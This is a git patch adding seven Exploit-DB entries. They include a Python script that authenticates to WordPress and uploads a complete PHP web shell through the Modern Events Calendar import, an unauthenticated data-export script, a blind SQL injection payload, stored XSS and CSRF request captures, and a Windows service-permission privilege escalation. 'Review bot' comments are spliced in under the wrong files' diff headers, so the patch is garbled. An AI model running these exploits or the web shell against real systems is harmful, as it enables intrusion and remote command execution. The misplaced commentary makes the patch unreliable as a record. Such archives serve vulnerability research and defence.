From 5bd61e68a2aec6442f1e9bdd364ec9e126b6980b Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Sat, 3 Jul 2021 05:01:54 +0000
Subject: [PATCH] DB: 2021-07-03 7 changes to exploits/shellcodes WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE) AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS) b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF) Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
---
 exploits/hardware/webapps/50080.txt | 67 +++++++++++++++
 exploits/multiple/webapps/50079.txt | 39 +++++++++
 exploits/php/webapps/50081.txt | 88 ++++++++++++++++++++
 exploits/php/webapps/50082.py | 122 ++++++++++++++++++++++++++++
 exploits/php/webapps/50084.py | 69 ++++++++++++++++
 exploits/php/webapps/50085.txt | 48 +++++++++++
 exploits/windows/local/50083.txt | 90 ++++++++++++++++++++
 files_exploits.csv | 7 ++
 8 files changed, 530 insertions(+)
 create mode 100644 exploits/hardware/webapps/50080.txt
 create mode 100644 exploits/multiple/webapps/50079.txt
 create mode 100644 exploits/php/webapps/50081.txt
 create mode 100755 exploits/php/webapps/50082.py
 create mode 100755 exploits/php/webapps/50084.py
 create mode 100644 exploits/php/webapps/50085.txt
 create mode 100644 exploits/windows/local/50083.txt
diff --git a/exploits/hardware/webapps/50080.txt b/exploits/hardware/webapps/50080.txt
new file mode 100644
index 000000000..ae03e8b3a
--- /dev/null
+++ b/exploits/hardware/webapps/50080.txt
@@ -0,0 +1,67 @@
+# Exploit Title: AKCP sensorProbe SPX476 - 'Multiple' Cross-Site Scripting (XSS)
+# Date: 07-01-2021
+# Exploit Author: Tyler Butler
+# Vendor Homepage: https://www.akcp.com/
+# Software Link: https://www.akcp.com/support-center/customer-login/sensorprobe-series-firmware-download/
+# Advisory: https://tbutler.org/2021/06/28/cve-2021-35956
+# Version: < SP480-20210624
+# CVE: CVE-2021-35956
+
+# Description: Stored cross-site scripting (XSS) in the embedded webserver of AKCP sensorProbe before SP480-20210624 enables remote authenticated attackers to introduce arbitrary JavaScript via the Sensor Description, Email (from/to/cc), System Name, and System Location fields.
+
+
+1) Stored Cross-Site Scripting via System Settings
+
+POST /system?time=32e004c941f912 HTTP/1.1
+Host: [target]
+Content-Length: 114
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://[target]
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://[target]/system?time=32e004c941f912
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+_SA01=System+Namer&_SA02=RDC&_SA03=Name&_SA04=1&_SA06=0&_SA36=0&_SA37=0&sbt1=Save
+
+2) Stored Cross-Site Scripting via Email Settings
+
+POST /mail?time=32e004c941f912 HTTP/1.1
+Host: [target]
+Content-Length: 162
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://[target]
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://[target]/mail?time=32e004c941f912
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Connection: close
+
+
+_PS03=test@test.com&_PS04=test@test.com&_PS05_0=test@test.com&_PS05_1=test@test.comr&_PS05_3=&_PS05_4=&sbt2=Save
+
+3) Stored Cross-Site Scripting via Sensor Description
+
+POST /senswatr?index=0&time=32e004c941f912 HTTP/1.1
+Host: [target]
+Content-Length: 55
+Cache-Control: max-age=0
+Upgrade-Insecure-Requests: 1
+Origin: http://[target]
+Content-Type: application/x-www-form-urlencoded
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
+Referer: http://[target]/senswatr?index=0&time=32e004c941f912
+Accept-Encoding: gzip, deflate
+Accept-Language: en-US,en;q=0.9
+Cookie: CPCookie=sensors=400
+Connection: close
+
+_WT00-IX=">&_WT03-IX=2&sbt1=Save
\ No newline at end of file
diff --git a/exploits/multiple/webapps/50079.txt b/exploits/multiple/webapps/50079.txt
new file mode 100644
index 000000000..69a397d47
--- /dev/null
+++ b/exploits/multiple/webapps/50079.txt
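Review bot: The header's `# Version: < SP480-20210624` names a firmware build while the title names the model `sensorProbe SPX476`, so the affected range is ambiguous to a reader; the header should carry both, e.g. `# Version: sensorProbe SPX476, firmware before SP480-20210624`, with a separate `# Fixed in: SP480-20210624` line matching the Description. The `time=32e004c941f912` query values and the `Cookie: CPCookie=sensors=400` line are captured from one session and should be marked as placeholders like `[target]`, as should the `Content-Length` values, which will no longer match once the bodies are edited. Since the Description says exploitation needs an authenticated session, the entry could also note that until the firmware is applied the exposure is limited to holders of web-UI credentials.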
@@ -0,0 +1,39 @@
+# Exploit Title: Scratch Desktop 3.17 - Cross-Site Scripting/Remote Code Execution (XSS/RCE)
+# Google Dork: 'inurl:"/projects/editor/?tutorial=getStarted" -mit.edu' (not foolproof on versioning)
+# Date: 2021-06-18
+# Exploit Author: Stig Magnus Baugstø
+# Vendor Homepage: https://scratch.mit.edu/
+# Software Link: https://web.archive.org/web/20210225011334/https://downloads.scratch.mit.edu/desktop/Scratch%20Desktop%20Setup%203.10.2.exe
+# Version: 3.10.2
+# Tested on: Windows 10 x64, but should be platform independent.
+# CVE: CVE-2020-7750
+
+Scratch cross-site scripting (XSS) & Scratch Desktop remote code execution (XSS/RCE) <3.17.1 / scratch-svg-renderer <0.2.0-prerelease.20201019174008
+
+CVE-2020-7750 was disclosed on Scratch's official forums on 21th of October 2020 by the forum user apple502j. The forum thread describes a cross-site scripting (XSS) vulnerability in Scratch and Scratch Desktop prior to 3.17.1: https://scratch.mit.edu/discuss/topic/449794/
+
+You can exploit the vulnerability by uploading a SVG (*.svg) file WITHOUT the viewBox attribute and embedding a malicious event handler. Example:
+
+
+
+
+The malicious SVG can be uploaded as a sprite or stored within a Scratch project file (*.sb3), which is a regular ZIP archive by the way.
+
+Example of regular cross-site scripting (XSS):
+
+
+
+
+The Scratch Desktop versions runs on Electron where the exploit can be used for remote code execution (RCE):
+
+
+
+
+The example above launches cmd.exe (Command Prompt) on Windows.
+
+For a full walkthrough and explanation of the exploit, please see the following blog post by the exploit's author: https://www.mnemonic.no/blog/exploiting-scratch-with-a-malicious-image/
+
+Note that the author of this exploit does not take credit for finding the vulnerability. The vulnerability was disclosed by user apple502j on Scratch's official forums.
\ No newline at end of file
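Review bot: `# Version: 3.10.2` and the `# Software Link` (the 3.10.2 installer) contradict the title's `Scratch Desktop 3.17` and the body's `<3.17.1`; the header should state the affected range and the tested build separately, e.g. `# Version: < 3.17.1 (tested on 3.10.2)`. Each of the three leads — `Example:`, `Example of regular cross-site scripting (XSS):` and `...remote code execution (RCE):` — is followed only by empty lines, so the SVG samples the prose refers to are not present in the committed text (the hunk header also counts more lines than are visible, so the markup was presumably stripped on import); either restore them or rewrite those sentences to point at the linked blog post. `21th of October 2020` should read `21st of October 2020`.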
diff --git a/exploits/php/webapps/50081.txt b/exploits/php/webapps/50081.txt
new file mode 100644
index 000000000..221e28d86
--- /dev/null
+++ b/exploits/php/webapps/50081.txt
@@ -0,0 +1,88 @@
+# Exploit Title: b2evolution 7.2.2 - 'edit account details' Cross-Site Request Forgery (CSRF)
+# Exploit Author: Alperen Ergel (@alpernae)
+# Vendor Homepage: https://b2evolution.net/
+# Software Link: https://b2evolution.net/downloads/7-2-2
+# Version : 7.2.2
+# Tested on: Kali Linux
+# Category: WebApp
+
+######## Description ########
+
+Allows to attacker change admin account details.
+
+######## Proof of Concept ########
+
+===> REQUEST <====
+
+POST /b2evolution/evoadm.php HTTP/1.1
+Host: s2.demo.opensourcecms.com
+Cookie: session_b2evo=1387_5XjmCda2lrphrrPvEEZqHq0CANmMmGDt;
+__cmpconsentx19318=CPIqFKEPIqFKEAfUmBENBgCsAP_AAH_AAAYgG9tf_X_fb3_j-_59__t0eY1f9_7_v-0zjheds-8Nyd_X_L8X_2M7vB36pr4KuR4ku3bBAQdtHOncTQmx6IlVqTPsb02Mr7NKJ7PEmlsbe2dYGH9_n9XT_ZKZ79_____7________77______3_v__9-BvbX_1_329_4_v-ff_7dHmNX_f-_7_tM44XnbPvDcnf1_y_F_9jO7wd-qa-CrkeJLt2wQEHbRzp3E0JseiJVakz7G9NjK-
+zSiezxJpbG3tnWBh_f5_V0_2Sme_f____-________--______9_7___fgAAA; __cmpcccx19318=aBPIqFKEgAADAAXAA0AB4AQ4DiQKnAAA;
+_ga=GA1.2.1294565572.1625137627; _gid=GA1.2.967259237.1625137627; __gads=ID=b3a3eb6f723d6f76-2210340b6fc800b7:T=1625137656:RT=1625137656:S=ALNI_MaB1e9iPH5NWYZhtIxGIyqg8LXMOA
+User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: application/x-www-form-urlencoded
+Content-Length: 1031
+Origin: https://s2.demo.opensourcecms.com
+Referer: https://s2.demo.opensourcecms.com/b2evolution/evoadm.php?blog=1&ctrl=user&user_tab=profile&user_ID=1&action=edit&user_tab=profile
+Upgrade-Insecure-Requests: 1
+Te: trailers
+Connection: close
+
+## < SNIPP >
+
+edited_user_login=opensourcecms&edited_user_firstname=Hacker&edited_user_lastname=Hacker&edited_user_nickname=demo&edited_user_gender=M&edited_user_ctry_ID=233&edited_user_rgn_ID=&edited_user_subrg_ID=&edited_user_city_ID=
+&edited_user_age_min=&edited_user_age_max=&edited_user_birthday_month=&edited_user_birthday_day=&edited_user_birthday_year=&organizations%5B%5D=1&org_roles%5B%5D=King+of+Spades&org_priorities%5B%5D=&uf_1=I+am+the+demo+administrator+of+this+site.%0D%0AI+love+having+so+much+power%21&uf_new%5B2%5D%5B%5D=
+&uf_new%5B3%5D%5B%5D=&uf_2=https%3A%2F%2Ftwitter.com%2Fb2evolution%2F&uf_3=https%3A%2F%2Fwww.facebook.com%2Fb2evolution&uf_4=https%3A%2F%2Fplus.google.com%2F%2Bb2evolution%2Fposts&uf_5=https%3A%2F%2Fwww.linkedin.com%2Fcompany%2Fb2evolution-net&uf_6=https%3A%2F%2Fgithub.com%2Fb2evolution%2Fb2evolution&uf_7=
+http%3A%2F%2Fb2evolution.net%2F&new_field_type=0&actionArray%5Bupdate%5D=Save+Changes%21&crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl&ctrl=user&user_tab=profile&identity_form=1&user_ID=1&orig_user_ID=1
+
+
+
+
+#### Proof-Of-Concept ####
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
\ No newline at end of file
diff --git a/exploits/php/webapps/50082.py b/exploits/php/webapps/50082.py
new file mode 100755
index 000000000..df8beabbe
--- /dev/null
+++ b/exploits/php/webapps/50082.py
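Review bot: The captured POST body ends with `crumb_user=zNkyQhORGCWRoCFgM0JhdvYkrqnYpCOl`, which looks like b2evolution's anti-CSRF crumb, and the write-up never says whether the server validates it; a cross-site form cannot supply a session-bound token, so as written the CSRF claim is unsupported and the request reads as a replay of the author's own authenticated session. The `######## Description ########` section should state what was verified — that the update is accepted with `crumb_user` omitted or with a stale value — and its one sentence should read `Allows an attacker to change the admin account details.`. The `#### Proof-Of-Concept ####` heading is followed by roughly forty empty lines, so the HTML form the PoC depends on is absent from the committed file, presumably stripped as markup on import. `Host: s2.demo.opensourcecms.com` and the `Cookie:` line are a third-party demo site's live session values and should be replaced with placeholders.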
@@ -0,0 +1,122 @@ +# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Remote Code Execution (Authenticated) +# Date 01.07.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip +# Version: Before 5.16.5 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24145 +# CWE: CWE-434 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24145/README.md + +''' +Description: +Arbitrary file upload in the Modern Events Calendar Lite WordPress plugin, versions before 5.16.5, +did not properly check the imported file, allowing PHP ones to be uploaded by administrator by using the 'text/csv' +content-type in the request. +''' + + +''' +Banner: +''' +banner = """ + ______ _______ ____ ___ ____ _ ____ _ _ _ _ _ ____ + / ___\ \ / / ____| |___ \ / _ \___ \/ | |___ \| || | / | || || ___| +| | \ \ / /| _| _____ __) | | | |__) | |_____ __) | || |_| | || ||___ \ +| |___ \ V / | |__|_____/ __/| |_| / __/| |_____/ __/|__ _| |__ _|__) | + \____| \_/ |_____| |_____|\___/_____|_| |_____| |_| |_| |_||____/ + + * Wordpress Plugin Modern Events Calendar Lite RCE + * @Hacker5preme + + +""" +print(banner) + +''' +Import required modules: +''' +import requests +import argparse + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events Calenar Lite RCE (Authenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +my_parser.add_argument('-u', '--USERNAME', type=str) +my_parser.add_argument('-p', '--PASSWORD', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH +username = args.USERNAME +password = args.PASSWORD +print('') + +''' +Authentication: +''' +session = requests.Session() +auth_url = 'http://' + 
target_ip + ':' + target_port + wp_path + 'wp-login.php' + +# Header: +header = { + 'Host': target_ip, + 'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0', + 'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8', + 'Accept-Language': 'de,en-US;q=0.7,en;q=0.3', + 'Accept-Encoding': 'gzip, deflate', + 'Content-Type': 'application/x-www-form-urlencoded', + 'Origin': 'http://' + target_ip, + 'Connection': 'close', + 'Upgrade-Insecure-Requests': '1' +} + +# Body: +body = { + 'log': username, + 'pwd': password, + 'wp-submit': 'Log In', + 'testcookie': '1' +} + +# Authenticate: +print('') +auth = session.post(auth_url, headers=header, data=body) +auth_header = auth.headers['Set-Cookie'] +if 'wordpress_logged_in' in auth_header: + print('[+] Authentication successfull !') +else: + print('[-] Authentication failed !') + exit() + + +''' +Exploit: +''' +exploit_url = "http://" + target_ip + ':' + target_port + wp_path + "wp-admin/admin.php?page=MEC-ix&tab=MEC-import" + +# Exploit Header: +header = { + "User-Agent": "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:89.0) Gecko/20100101 Firefox/89.0", + "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", + "Accept-Language": "de,en-US;q=0.7,en;q=0.3", + "Accept-Encoding": "gzip, deflate", + "Content-Type": "multipart/form-data; boundary=---------------------------29650037893637916779865254589", + "Origin": "http://" + target_ip, + "Connection": "close", + "Upgrade-Insecure-Requests": "1" +} + +# Exploit Body: (using p0wny shell: https://github.com/flozz/p0wny-shell +body = "-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"feed\"; filename=\"shell.php\"\r\nContent-Type: text/csv\r\n\r\n&1)?$/\", $cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*cd\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n chdir($match[1]);\n } elseif (preg_match(\"/^\\s*download\\s+[^\\s]+\\s*(2>&1)?$/\", 
$cmd)) {\n chdir($cwd);\n preg_match(\"/^\\s*download\\s+([^\\s]+)\\s*(2>&1)?$/\", $cmd, $match);\n return featureDownload($match[1]);\n } else {\n chdir($cwd);\n exec($cmd, $stdout);\n }\n\n return array(\n \"stdout\" => $stdout,\n \"cwd\" => getcwd()\n );\n}\n\nfunction featurePwd() {\n return array(\"cwd\" => getcwd());\n}\n\nfunction featureHint($fileName, $cwd, $type) {\n chdir($cwd);\n if ($type == 'cmd') {\n $cmd = \"compgen -c $fileName\";\n } else {\n $cmd = \"compgen -f $fileName\";\n }\n $cmd = \"/bin/bash -c \\\"$cmd\\\"\";\n $files = explode(\"\\n\", shell_exec($cmd));\n return array(\n 'files' => $files,\n );\n}\n\nfunction featureDownload($filePath) {\n $file = @file_get_contents($filePath);\n if ($file === FALSE) {\n return array(\n 'stdout' => array('File not found / no read permission.'),\n 'cwd' => getcwd()\n );\n } else {\n return array(\n 'name' => basename($filePath),\n 'file' => base64_encode($file)\n );\n }\n}\n\nfunction featureUpload($path, $file, $cwd) {\n chdir($cwd);\n $f = @fopen($path, 'wb');\n if ($f === FALSE) {\n return array(\n 'stdout' => array('Invalid path / no write permission.'),\n 'cwd' => getcwd()\n );\n } else {\n fwrite($f, base64_decode($file));\n fclose($f);\n return array(\n 'stdout' => array('Done.'),\n 'cwd' => getcwd()\n );\n }\n}\n\nif (isset($_GET[\"feature\"])) {\n\n $response = NULL;\n\n switch ($_GET[\"feature\"]) {\n case \"shell\":\n $cmd = $_POST['cmd'];\n if (!preg_match('/2>/', $cmd)) {\n $cmd .= ' 2>&1';\n }\n $response = featureShell($cmd, $_POST[\"cwd\"]);\n break;\n case \"pwd\":\n $response = featurePwd();\n break;\n case \"hint\":\n $response = featureHint($_POST['filename'], $_POST['cwd'], $_POST['type']);\n break;\n case 'upload':\n $response = featureUpload($_POST['path'], $_POST['file'], $_POST['cwd']);\n }\n\n header(\"Content-Type: application/json\");\n echo json_encode($response);\n die();\n}\n\n?>\n\n\n\n \n \n p0wny@shell:~#\n \n \n\n \n \n\n \n
\n
\n                
\n ___ ____ _ _ _ _ _ \n _ __ / _ \\__ ___ __ _ _ / __ \\ ___| |__ ___| | |_ /\\/|| || |_ \n| '_ \\| | | \\ \\ /\\ / / '_ \\| | | |/ / _` / __| '_ \\ / _ \\ | (_)/\\/_ .. _|\n| |_) | |_| |\\ V V /| | | | |_| | | (_| \\__ \\ | | | __/ | |_ |_ _|\n| .__/ \\___/ \\_/\\_/ |_| |_|\\__, |\\ \\__,_|___/_| |_|\\___|_|_(_) |_||_| \n|_| |___/ \\____/ \n
\n
\n
\n \n
\n \n
\n
\n
\n \n\n\n\r\n-----------------------------29650037893637916779865254589\r\nContent-Disposition: form-data; name=\"mec-ix-action\"\r\n\r\nimport-start-bookings\r\n-----------------------------29650037893637916779865254589--\r\n" + +# Exploit +session.post(exploit_url, headers=header, data=body) +print('') +print('[+] Shell Uploaded to: ' + 'http://' + target_ip + ':' + target_port + wp_path + '/wp-content/uploads/shell.php') +print('') \ No newline at end of file diff --git a/exploits/php/webapps/50084.py b/exploits/php/webapps/50084.py new file mode 100755 index 000000000..2732a6cf8 --- /dev/null +++ b/exploits/php/webapps/50084.py 
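Review bot: The closing `print('[+] Shell Uploaded to: ...')` runs unconditionally: the result of `session.post(exploit_url, headers=header, data=body)` is discarded and neither status code nor body is inspected, so the script reports success even on a site at or above the `# Version: Before 5.16.5` cut-off that rejects the file; assign the response and print a failure line when it is not `200`. The reported path is built as `wp_path + '/wp-content/uploads/shell.php'` while the earlier URLs in this hunk use `wp_path + 'wp-login.php'` and `wp_path + "wp-admin/admin.php?..."`, so with the `/`-terminated `-U` value those lines require the printed URL contains `//`. `auth.headers['Set-Cookie']` raises `KeyError` instead of reaching the `[-] Authentication failed !` branch when the login response sets no cookie; `auth.headers.get('Set-Cookie', '')` keeps the intended message. On the defensive side, the Description shows the plugin accepted a `.php` filename because the multipart part declared `Content-Type: text/csv`; an import filter should decide on the stored extension and file contents, never on the client-supplied MIME type.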
@@ -0,0 +1,69 @@ +# Exploit Title: Wordpress Plugin Modern Events Calendar 5.16.2 - Event export (Unauthenticated) +# Date 01.07.2021 +# Exploit Author: Ron Jost (Hacker5preme) +# Vendor Homepage: https://webnus.net/modern-events-calendar/ +# Software Link: https://downloads.wordpress.org/plugin/modern-events-calendar-lite.5.16.2.zip +# Version: Before 5.16.5 +# Tested on: Ubuntu 18.04 +# CVE: CVE-2021-24146 +# CWE: CWE-863, CWE-284 +# Documentation: https://github.com/Hacker5preme/Exploits/blob/main/Wordpress/CVE-2021-24146/README.md + +''' +Description: +Lack of authorisation checks in the Modern Events Calendar Lite WordPress plugin, +versions before 5.16.5, did not properly restrict access to the export files, +allowing unauthenticated users to exports all events data in CSV or XML format for example. +''' + + +''' +Banner: +''' +banner = """ + _______ ________ ___ ____ ___ ___ ___ __ __ _____ __ _____ + / ____/ | / / ____/ |__ \ / __ \__ \< / |__ \/ // /< / // / / ___/ + / / | | / / __/________/ // / / /_/ // /_______/ / // /_/ / // /_/ __ \ +/ /___ | |/ / /__/_____/ __// /_/ / __// /_____/ __/__ __/ /__ __/ /_/ / +\____/ |___/_____/ /____/\____/____/_/ /____/ /_/ /_/ /_/ \____/ + + * WordPress Plugin Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated) + * @Hacker5preme + +""" +print(banner) + + +''' +Import required modules: +''' +import requests +import argparse +import csv + +''' +User-Input: +''' +my_parser = argparse.ArgumentParser(description='Wordpress Plugin Modern Events CalendarExport Event Data (Unauthenticated)') +my_parser.add_argument('-T', '--IP', type=str) +my_parser.add_argument('-P', '--PORT', type=str) +my_parser.add_argument('-U', '--PATH', type=str) +args = my_parser.parse_args() +target_ip = args.IP +target_port = args.PORT +wp_path = args.PATH + + +''' +Exploit: +''' +print('') +print('[+] Exported Data: ') +print('') +exploit_url = 'http://' + target_ip + ':' + target_port + wp_path + 
'/wp-admin/admin.php?page=MEC-ix&tab=MEC-export&mec-ix-action=export-events&format=csv'
+answer = requests.get(exploit_url)
+decoded_content = answer.content.decode('utf-8')
+cr = csv.reader(decoded_content.splitlines(), delimiter=',')
+my_list = list(cr)
+for row in my_list:
+ print(row)
\ No newline at end of file
diff --git a/exploits/php/webapps/50085.txt b/exploits/php/webapps/50085.txt
new file mode 100644
index 000000000..00d7dcc90
--- /dev/null
+++ b/exploits/php/webapps/50085.txt
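Review bot: The banner line `Modern Events Calendar Lite < 5.16.2 - Export Event Data (Unauthenticated)` contradicts `# Version: Before 5.16.5` in the header and the `5.16.2` in the title; it should say `< 5.16.5`. The response is handed to `csv.reader` without checking `answer.status_code` or its content type, so a login redirect or HTML page from a site that carries the 5.16.5 authorisation check is printed row by row under `[+] Exported Data:` as if it were event data; the script should report that case instead of printing rows. `answer.content.decode('utf-8')` raises `UnicodeDecodeError` on non-UTF-8 event text, whereas `answer.text` would apply the charset the server declares.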
@@ -0,0 +1,48 @@
+# Exploit Title: Garbage Collection Management System 1.0 - SQL Injection (Unauthenticated)
+# Exploit Author: ircashem
+# Date 02.07.2021
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/php/14854/garbage-collection-management-system-php.html
+# Version 1.0
+# Tested on: Ubuntu 20.04
+
+####################
+# Proof of Concept #
+####################
+
+POST /login.php HTTP/1.1
+Content-Length: 456
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------238993435340593308934076060075
+Origin: http://localhost
+DNT: 1
+Referer: http://localhost/
+Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im
+Upgrade-Insecure-Requests: 1
+Sec-GPC: 1
+Connection: close
+
+-----------------------------238993435340593308934076060075
+Content-Disposition: form-data; name="username"
+
+admin
+-----------------------------238993435340593308934076060075
+Content-Disposition: form-data; name="password"
+
+admin' AND (SELECT 1 from (select sleep(5))a) -- -
+-----------------------------238993435340593308934076060075
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------238993435340593308934076060075--
+
+###########
+# Payload #
+###########
+
+username=admin
+password=admin' AND (SELECT 1 from (select sleep(5))a) -- -
\ No newline at end of file
diff --git a/exploits/windows/local/50083.txt b/exploits/windows/local/50083.txt
new file mode 100644
index 000000000..ffce49ae1
--- /dev/null
+++ b/exploits/windows/local/50083.txt
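Review bot: The header has no CVE, vendor-response or fix line and the title does not name the injection point, so a reader cannot tell the exposure status; add the parameter to the header (`# Parameter: password (POST /login.php)`) and a `# Fixed: <status as of date>` line, using placeholders until the status is known. The text never says the PoC is a blind, time-based injection — the `# Payload #` section should state that the only success signal is a delay of roughly five seconds from `sleep(5)`, not an error or data in the response. `Cookie: PHPSESSID=v9j5jnmku4ags9lmp44ejah8im`, the multipart boundary and `Content-Length: 456` are capture-specific and should be marked as placeholders, since the length will not match once the payload is edited. The defect is an unparameterised query behind `login.php`, so the remediation to record is prepared statements for the login lookup.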
@@ -0,0 +1,90 @@
+# Exploit Title: WinWaste.NET 1.0.6183.16475 - Privilege Escalation due Incorrect Access Control
+# Date: 2021-07-01
+# Author: Andrea Intilangelo
+# Vendor Homepage: http://nica.it - http://winwastenet.com
+# Version: 1.0.6183.16475
+# Tested on: Windows 10 Pro x64 - 20H2 and 21H1
+
+WinWaste.NET version 1.0.6183.16475 (from Nica s.r.l., a Zucchetti Group company) allows a local unprivileged user to replace the executable with a malicious file that will be executed with "LocalSystem" privileges.
+
+(1) Affected service's executable: "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
+
+(2) Attack Vectors: replacing the WinWasteService.exe and/or any tied .dll used by the software.
+
+(3) Details:
+
+C:\Users\user>sc qc winwasteservice
+[SC] QueryServiceConfig OPERAZIONI RIUSCITE
+
+NOME_SERVIZIO: winwasteservice
+ TIPO : 10 WIN32_OWN_PROCESS
+ TIPO_AVVIO : 2 AUTO_START
+ CONTROLLO_ERRORE : 1 NORMAL
+ NOME_PERCORSO_BINARIO : "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
+ GRUPPO_ORDINE_CARICAMENTO :
+ TAG : 0
+ NOME_VISUALIZZATO : WinwasteService
+ DIPENDENZE :
+ SERVICE_START_NAME : LocalSystem
+
+
+C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
+C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe Everyone:(I)(M)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Users:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
+
+Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
+
+C:\Users\user>cacls "C:\Program Files (x86)\WW.NET\WW.PROG\WinWasteService.exe"
+C:\Program Files (x86)\WW.NET\WW.PROG\WINWASTESERVICE.EXE Everyone:(ID)C
+ NT AUTHORITY\SYSTEM:(ID)F
+ BUILTIN\Administrators:(ID)F
+ BUILTIN\Users:(ID)R
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(ID)R
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(ID)R
+
+C:\Users\user>icacls "C:\Program Files (x86)\WW.NET\WW.PROG"
+C:\Program Files (x86)\WW.NET\WW.PROG Everyone:(I)(OI)(CI)(M)
+ NT SERVICE\TrustedInstaller:(I)(F)
+ NT SERVICE\TrustedInstaller:(I)(CI)(IO)(F)
+ NT AUTHORITY\SYSTEM:(I)(F)
+ NT AUTHORITY\SYSTEM:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Administrators:(I)(F)
+ BUILTIN\Administrators:(I)(OI)(CI)(IO)(F)
+ BUILTIN\Users:(I)(RX)
+ BUILTIN\Users:(I)(OI)(CI)(IO)(GR,GE)
+ CREATOR OWNER:(I)(OI)(CI)(IO)(F)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI:(I)(OI)(CI)(IO)(GR,GE)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(RX)
+ AUTORITÀ PACCHETTI APPLICAZIONI\TUTTI I PACCHETTI APPLICAZIONI CON RESTRIZIONI:(I)(OI)(CI)(IO)(GR,GE)
+
+Elaborazione completata per 1 file. Elaborazione non riuscita per 0 file
+
+
